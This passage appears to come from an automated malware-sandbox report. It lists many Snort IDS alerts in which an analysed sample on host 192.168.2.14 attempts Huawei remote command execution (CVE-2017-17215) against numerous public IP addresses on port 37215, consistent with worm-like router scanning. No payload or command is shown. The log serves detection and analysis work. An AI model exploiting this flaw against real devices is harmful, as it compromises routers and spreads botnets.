              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53772 -> 197.219.160.109:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39744 -> 41.82.238.206:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39744 -> 41.82.238.206:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37696 -> 41.194.169.6:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37696 -> 41.194.169.6:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49686 -> 156.200.181.229:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49686 -> 156.200.181.229:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41152 -> 156.18.202.162:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41152 -> 156.18.202.162:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39814 -> 156.231.38.101:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39814 -> 156.231.38.101:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59058 -> 41.164.83.142:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59058 -> 41.164.83.142:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53730 -> 197.139.243.135:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53730 -> 197.139.243.135:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40528 -> 197.222.221.189:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40528 -> 197.222.221.189:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58928 -> 156.238.129.165:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58928 -> 156.238.129.165:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56994 -> 197.197.243.183:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56994 -> 197.197.243.183:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48932 -> 41.128.35.59:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48932 -> 41.128.35.59:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59520 -> 156.150.211.67:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59520 -> 156.150.211.67:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45528 -> 41.203.92.245:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45528 -> 41.203.92.245:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47878 -> 41.202.231.52:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47878 -> 41.202.231.52:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44590 -> 197.143.96.116:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44590 -> 197.143.96.116:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55808 -> 156.119.146.174:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55808 -> 156.119.146.174:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45216 -> 156.177.28.10:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45216 -> 156.177.28.10:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40284 -> 41.8.213.120:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40284 -> 41.8.213.120:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42474 -> 41.133.250.50:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42474 -> 41.133.250.50:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39980 -> 156.254.160.136:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39980 -> 156.254.160.136:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47336 -> 197.207.180.13:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47336 -> 197.207.180.13:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34986 -> 156.229.85.49:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34986 -> 156.229.85.49:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49978 -> 197.190.253.88:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49978 -> 197.190.253.88:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54386 -> 41.239.49.185:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54386 -> 41.239.49.185:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48634 -> 41.167.190.75:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48634 -> 41.167.190.75:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35904 -> 156.243.0.183:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35904 -> 156.243.0.183:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37550 -> 197.112.42.248:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37550 -> 197.112.42.248:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52306 -> 41.46.183.102:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52306 -> 41.46.183.102:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36094 -> 156.13.57.250:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36094 -> 156.13.57.250:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47366 -> 41.1.138.117:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47366 -> 41.1.138.117:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35364 -> 41.29.87.94:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35364 -> 41.29.87.94:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34798 -> 156.34.3.191:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34798 -> 156.34.3.191:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41222 -> 197.27.187.97:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41222 -> 197.27.187.97:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48226 -> 197.225.49.66:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48226 -> 197.225.49.66:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37528 -> 156.21.179.125:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37528 -> 156.21.179.125:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41936 -> 156.188.19.114:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41936 -> 156.188.19.114:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33344 -> 156.99.213.65:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33344 -> 156.99.213.65:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48238 -> 197.164.250.121:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48238 -> 197.164.250.121:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60576 -> 197.151.100.125:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60576 -> 197.151.100.125:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37576 -> 41.148.174.163:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37576 -> 41.148.174.163:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52596 -> 41.92.140.216:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52596 -> 41.92.140.216:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45614 -> 197.107.159.226:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45614 -> 197.107.159.226:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39344 -> 197.69.11.105:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39344 -> 197.69.11.105:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54194 -> 41.127.210.27:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54194 -> 41.127.210.27:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57746 -> 41.17.104.98:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57746 -> 41.17.104.98:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41214 -> 156.6.58.55:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41214 -> 156.6.58.55:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41864 -> 41.39.14.181:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41864 -> 41.39.14.181:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37688 -> 156.251.245.149:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37688 -> 156.251.245.149:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41142 -> 197.95.142.7:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41142 -> 197.95.142.7:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45694 -> 41.66.135.68:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45694 -> 41.66.135.68:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47610 -> 156.13.82.96:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47610 -> 156.13.82.96:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37618 -> 197.150.96.223:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37618 -> 197.150.96.223:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49658 -> 41.106.105.176:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49658 -> 41.106.105.176:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50048 -> 156.195.134.5:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50048 -> 156.195.134.5:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50792 -> 156.194.215.17:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50792 -> 156.194.215.17:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47840 -> 156.164.225.185:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47840 -> 156.164.225.185:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47370 -> 156.64.30.138:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47370 -> 156.64.30.138:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57560 -> 41.56.243.110:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57560 -> 41.56.243.110:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41548 -> 41.78.181.194:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41548 -> 41.78.181.194:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36186 -> 41.8.44.210:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36186 -> 41.8.44.210:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60954 -> 197.137.16.96:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60954 -> 197.137.16.96:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37588 -> 41.180.31.80:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37588 -> 41.180.31.80:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48148 -> 41.252.252.230:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48148 -> 41.252.252.230:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50420 -> 41.29.33.191:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50420 -> 41.29.33.191:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40242 -> 156.250.246.86:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40242 -> 156.250.246.86:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57160 -> 41.24.86.92:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57160 -> 41.24.86.92:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52926 -> 41.226.92.240:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52926 -> 41.226.92.240:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51710 -> 156.125.129.63:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51710 -> 156.125.129.63:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54988 -> 41.218.92.40:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54988 -> 41.218.92.40:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60456 -> 41.154.117.158:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60456 -> 41.154.117.158:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50398 -> 41.116.113.130:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50398 -> 41.116.113.130:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45050 -> 197.175.129.195:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45050 -> 197.175.129.195:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56822 -> 197.116.225.223:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56822 -> 197.116.225.223:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52136 -> 41.200.53.47:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52136 -> 41.200.53.47:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41756 -> 41.215.251.115:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41756 -> 41.215.251.115:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37254 -> 156.28.204.125:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37254 -> 156.28.204.125:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48458 -> 156.161.214.109:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48458 -> 156.161.214.109:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34834 -> 41.74.218.69:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34834 -> 41.74.218.69:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51916 -> 197.214.25.244:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51916 -> 197.214.25.244:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58340 -> 41.30.140.229:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58340 -> 41.30.140.229:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47220 -> 41.11.9.160:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47220 -> 41.11.9.160:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33304 -> 156.33.213.35:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33304 -> 156.33.213.35:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33100 -> 41.164.167.64:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33100 -> 41.164.167.64:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57626 -> 41.145.12.182:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57626 -> 41.145.12.182:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57056 -> 197.213.201.186:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57056 -> 197.213.201.186:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38582 -> 41.167.21.178:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38582 -> 41.167.21.178:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57382 -> 41.165.241.236:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57382 -> 41.165.241.236:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34624 -> 41.57.153.43:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34624 -> 41.57.153.43:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35484 -> 156.194.188.235:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35484 -> 156.194.188.235:37215
